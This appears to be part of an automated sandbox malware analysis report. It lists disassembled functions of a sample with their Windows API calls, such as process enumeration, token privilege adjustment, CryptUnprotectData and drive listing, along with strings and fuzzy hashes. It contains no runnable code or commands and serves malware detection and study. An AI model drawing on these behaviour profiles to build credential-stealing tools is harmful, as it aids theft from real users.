Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Internet$Query$AvailableDataHttpInfoOpen_invalid_parameter_noinfo_noreturn$CloseConcurrency::cancel_current_taskFileHandleRead
String ID:
API String ID: 1352168858-0
Opcode ID: 48aa74de5f0a3ad47d992b167929addd88f9aa4d68cb920af486e745a61cb0b1
Instruction ID: 9fbc9004f472f85f7ef238fd1b1a242b117503490d7a198ade1eba32cc8d5664
Opcode Fuzzy Hash: 48aa74de5f0a3ad47d992b167929addd88f9aa4d68cb920af486e745a61cb0b1
Instruction Fuzzy Hash: E0028132A18B9585EB10CB69E89036E77F5FB85794F104226EE9D97B99DF3CD180C700

Function 00007FF62184E610 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 328processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF62184E65A
Process32FirstW.KERNEL32 ref: 00007FF62184E69C
Process32NextW.KERNEL32 ref: 00007FF62184E893
CloseHandle.KERNEL32 ref: 00007FF62184EB0A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184EBA3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184EBA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184EBAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184EBB5

Strings

[PID: , xrefs: 00007FF62184E6DE

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: [PID:
API String ID: 1946380282-2210602247
Opcode ID: b3ba4167a38e437cf9bdfbb6da6b83bbf8875a5420a46623bc394bdd0b424b89
Instruction ID: 6316aa3812d321ff7fed493cc25b9a8a6d03a3743dd21075c55ba7764a2c33eb
Opcode Fuzzy Hash: b3ba4167a38e437cf9bdfbb6da6b83bbf8875a5420a46623bc394bdd0b424b89
Instruction Fuzzy Hash: E5E17273A1CBC185EB20CB25E8843AE77A5F789794F504225EA9D87B99DF3CD244C701

Function 00007FF62184ECB0 Relevance: 15.7, APIs: 10, Instructions: 715COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9A1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9A7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9AD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9B3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9B9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9BF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9CB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184F9D7

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 0c38bfc28c49ef3b4e24762e9187bf4ee87e2b3f3f9d8ffecf053da98e37da86
Instruction ID: acee6b32d36d58144ba12867a10c6f105753fa6992f3ee30a4fffcd0afe94694
Opcode Fuzzy Hash: 0c38bfc28c49ef3b4e24762e9187bf4ee87e2b3f3f9d8ffecf053da98e37da86
Instruction Fuzzy Hash: 69725F72A19BC589EB208B69E8803AD73A5F789798F104325EEDC97B99DF3CD140C741

Function 00007FF62188F020 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 451fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32 ref: 00007FF62188F261
SetFilePointer.KERNEL32 ref: 00007FF62188F314
ReadFile.KERNEL32 ref: 00007FF62188F343
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188F7D7

Strings

ios_base::badbit set, xrefs: 00007FF62188F771, 00007FF62188F7EF
exists, xrefs: 00007FF62188F7CA
ios_base::eofbit set, xrefs: 00007FF62188F784
ios_base::failbit set, xrefs: 00007FF62188F77D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: File$PointerReadSize_invalid_parameter_noinfo_noreturn
String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2478245620-15404121
Opcode ID: 811a3e21e021906b1992edde09561985dc272127cf0c81413d17bef69a8b0c9d
Instruction ID: 68f315c1465083284ae222a78d17175196f8a17821d4b85414fa3c4be46ba556
Opcode Fuzzy Hash: 811a3e21e021906b1992edde09561985dc272127cf0c81413d17bef69a8b0c9d
Instruction Fuzzy Hash: CE320832A18BC58AEB20DF24DC803ED37A1FB45788F548226DA4D97B99EF78D545C702

Function 00007FF6218B2E3C Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6218B2E81

Part of subcall function 00007FF6218B24E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B24FC

Part of subcall function 00007FF6218AD3C8: RtlFreeHeap.NTDLL ref: 00007FF6218AD3DE
Part of subcall function 00007FF6218AD3C8: GetLastError.KERNEL32 ref: 00007FF6218AD3E8

Part of subcall function 00007FF6218A8284: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6218A8233,?,?,?,?,-2723E8D8DEBC5093,00007FF6218A811E), ref: 00007FF6218A828D
Part of subcall function 00007FF6218A8284: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6218A8233,?,?,?,?,-2723E8D8DEBC5093,00007FF6218A811E), ref: 00007FF6218A82B2

Part of subcall function 00007FF6218BBA84: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218BB9CF

_get_daylight.LIBCMT ref: 00007FF6218B2E70

Part of subcall function 00007FF6218B2548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B255C

_get_daylight.LIBCMT ref: 00007FF6218B30E6
_get_daylight.LIBCMT ref: 00007FF6218B30F7
_get_daylight.LIBCMT ref: 00007FF6218B3108
GetTimeZoneInformation.KERNEL32(00007FF6218B33F8), ref: 00007FF6218B312F

Strings

Eastern Summer Time, xrefs: 00007FF6218B31ED
Eastern Standard Time, xrefs: 00007FF6218B31D5

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 6ff4704e37b1592320c13e659d1f856dd22dc212be1b833c6838491f576543a9
Instruction ID: f32559e86d05e0263f4ec771a3895c65e51b41ca44f16777b3d3663139d1816d
Opcode Fuzzy Hash: 6ff4704e37b1592320c13e659d1f856dd22dc212be1b833c6838491f576543a9
Instruction Fuzzy Hash: DBD1AF62E0C64286EF20AF26DCC01BA6762FF88794F444136EE5DC7A86DF3CE5418342

Function 00007FF6218D0658 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6218D023C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218D027D
Part of subcall function 00007FF6218D023C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218D02FB
Part of subcall function 00007FF6218D023C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218D034C

CreateFileW.KERNEL32 ref: 00007FF6218D075E
CreateFileW.KERNEL32 ref: 00007FF6218D07AE
GetLastError.KERNEL32 ref: 00007FF6218D07DE
GetFileType.KERNEL32 ref: 00007FF6218D07F3
GetLastError.KERNEL32 ref: 00007FF6218D07FD
CloseHandle.KERNEL32 ref: 00007FF6218D0830
CloseHandle.KERNEL32 ref: 00007FF6218D0993
CreateFileW.KERNEL32 ref: 00007FF6218D09C8
GetLastError.KERNEL32 ref: 00007FF6218D09D7

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 9219a76bbf5b0a68fd8075754a2c2160bfaa822f6e476498c8a23ea95eed312f
Instruction ID: 4b6146b15691fdb3df83b242983e2c582e38b34a8cbcb957f4eedb5c265c632f
Opcode Fuzzy Hash: 9219a76bbf5b0a68fd8075754a2c2160bfaa822f6e476498c8a23ea95eed312f
Instruction Fuzzy Hash: 7AC1A036B28B4586EF10CFA5C8806AC37A1EB49BA8F115226DE2EDB395CF3CD151C341

Function 00007FF6218B30B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6218B30E6

Part of subcall function 00007FF6218B2548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B255C

_get_daylight.LIBCMT ref: 00007FF6218B30F7

Part of subcall function 00007FF6218B24E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B24FC

_get_daylight.LIBCMT ref: 00007FF6218B3108

Part of subcall function 00007FF6218B2518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B252C

Part of subcall function 00007FF6218AD3C8: RtlFreeHeap.NTDLL ref: 00007FF6218AD3DE
Part of subcall function 00007FF6218AD3C8: GetLastError.KERNEL32 ref: 00007FF6218AD3E8

GetTimeZoneInformation.KERNEL32(00007FF6218B33F8), ref: 00007FF6218B312F

Strings

Eastern Summer Time, xrefs: 00007FF6218B31ED
Eastern Standard Time, xrefs: 00007FF6218B31D5

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 12951480f3fe79566017d45e51369301be5158125170c6a9e6aaf334c955a331
Instruction ID: 5c2ebf6fb1b8a5ba4edcdf678b10d9349eeb42aa5bcee4ed0ca1e320815851c6
Opcode Fuzzy Hash: 12951480f3fe79566017d45e51369301be5158125170c6a9e6aaf334c955a331
Instruction Fuzzy Hash: 32517E72E1C64286EB20DF25ECC05BA6761FF88788F44513AEA5DC3A96DF3CE5418742

Function 00007FF6218A918C Relevance: 9.2, APIs: 6, Instructions: 227COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A91AE
_get_daylight.LIBCMT ref: 00007FF6218A920E
_get_daylight.LIBCMT ref: 00007FF6218A921F
_get_daylight.LIBCMT ref: 00007FF6218A9230
_isindst.LIBCMT ref: 00007FF6218A9281
_isindst.LIBCMT ref: 00007FF6218A92D4

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: cd6fea744430340711cd49b3e9bdbfdb1b852b0eb5a7692198664b91c055b650
Instruction ID: 79e52edd6aeffa4c6ec36b816e3658bc21e3cb92175872da0f09b1eb637b330d
Opcode Fuzzy Hash: cd6fea744430340711cd49b3e9bdbfdb1b852b0eb5a7692198664b91c055b650
Instruction Fuzzy Hash: 03818EB2E0D6464BEF588F25CD813B877A5EB54B88F049139DA0DCA789EE3CE5418742

Function 00007FF621896860 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621896C4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621896C51
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621896C57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621896C5D

Strings

cores, xrefs: 00007FF621896ABE

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: cores
API String ID: 3668304517-2370456839
Opcode ID: b0c20e7a96be92ebb4058265aa1872eb2f02e76620fda403d2d5d6a95827fcb4
Instruction ID: 31d25d755b87a11a262711e576dedea6cffd58786294c10770546a0870d94561
Opcode Fuzzy Hash: b0c20e7a96be92ebb4058265aa1872eb2f02e76620fda403d2d5d6a95827fcb4
Instruction Fuzzy Hash: 45C1D563E1CB818AFB10CB78D8503AD7761E7997A8F105325EA9C92A96DF3CD185C380

Function 00007FF62189B9B0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF62189B9FE
OpenProcessToken.ADVAPI32 ref: 00007FF62189BA11
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF62189BA32
AdjustTokenPrivileges.KERNELBASE ref: 00007FF62189BA78
CloseHandle.KERNEL32 ref: 00007FF62189BA98

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: d2de06470b4ed8e39d37734a47601b9eff7cf65b32299141bc4bcc42cf026e17
Instruction ID: 6464c7bbbf16039604b1fbd4b8794db42258841f03169e13509997366159b288
Opcode Fuzzy Hash: d2de06470b4ed8e39d37734a47601b9eff7cf65b32299141bc4bcc42cf026e17
Instruction Fuzzy Hash: EC216F3261DB8186EB60CF12F89435AB7A0FB88B84F558135FA8D83B58DF7CD5448B40

Function 00007FF62183F730 Relevance: 4.8, APIs: 3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377d3ad3bbe0b1cc38d00efee9cf069e3120fae6c393bf4870136eddab2ad6fe
Instruction ID: fe82c499a6ea27c8c78e4fc4cf4c3f32db2720230a69fa826a71b130f1f46308
Opcode Fuzzy Hash: 377d3ad3bbe0b1cc38d00efee9cf069e3120fae6c393bf4870136eddab2ad6fe
Instruction Fuzzy Hash: 0AF17572A19F848AEB208B69E88135D77A0F78C798F104325EEDC97B99DF3CD1918741

Function 00007FF621840450 Relevance: 4.8, APIs: 3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89047e2c134d2de8222bd93685ea05c1333d6652247f77fc7e767346a328a7e8
Instruction ID: 0f9251edbfa622a54a9db3117648c2437abde57bfb2467c8e00e76ef1cac76f8
Opcode Fuzzy Hash: 89047e2c134d2de8222bd93685ea05c1333d6652247f77fc7e767346a328a7e8
Instruction Fuzzy Hash: 5EF14472A19F8489EB208B69E88135E77B4F788798F104325EEDC97B99EF3CD1508740

Function 00007FF62183FE20 Relevance: 4.8, APIs: 3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341eb272b4a22be45a202a6928eb2d2aab999db501b0ed677774bda0541c0bb7
Instruction ID: b6852094cbfeb3dfa3eeaec4f378a79a42836a64088949382805a9642d2fe80a
Opcode Fuzzy Hash: 341eb272b4a22be45a202a6928eb2d2aab999db501b0ed677774bda0541c0bb7
Instruction Fuzzy Hash: A6F16572A19F8489EB208B69E88135E77A4F788798F105325EEDC97B99DF7CD140C740

Function 00007FF6218976A0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 00007FF6218979D0

Strings

[UTC, xrefs: 00007FF6218979A3

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: InformationTimeZone
String ID: [UTC
API String ID: 565725191-1715286942
Opcode ID: f916e4f3ebb569f7f3c5b02c31c47bcb372a32c9b9c0afcac5d12b3a62fd46d9
Instruction ID: 127604ae6cfaa2f5718a015fd4452c816cd3972746dfeba071679f4e143db0c9
Opcode Fuzzy Hash: f916e4f3ebb569f7f3c5b02c31c47bcb372a32c9b9c0afcac5d12b3a62fd46d9
Instruction Fuzzy Hash: 2AB13E32919BC889D7318F29E88129AB7A4F79D788F105325EACC97B59DF7CD250CB40

Function 00007FF6218973F0 Relevance: 3.1, APIs: 2, Instructions: 137COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32 ref: 00007FF621897461

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: DriveLogicalStrings
String ID:
API String ID: 2022863570-0
Opcode ID: f6ceb80b0c54661202406279a27d1246873c28b015f3fe28699c28658eddbd14
Instruction ID: 125238ede5f520ee268058aa6d24c4eac8899dd5a1b31f94993cf08ab1c404b9
Opcode Fuzzy Hash: f6ceb80b0c54661202406279a27d1246873c28b015f3fe28699c28658eddbd14
Instruction Fuzzy Hash: D3517332A1CB8182EB108F24E8803AD7765FB84798F105625EA9C53BA9DF7CE591DB41

Function 00007FF621887BA0 Relevance: 3.1, APIs: 2, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 00007FF621887BF8
LocalFree.KERNEL32 ref: 00007FF621887C8A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

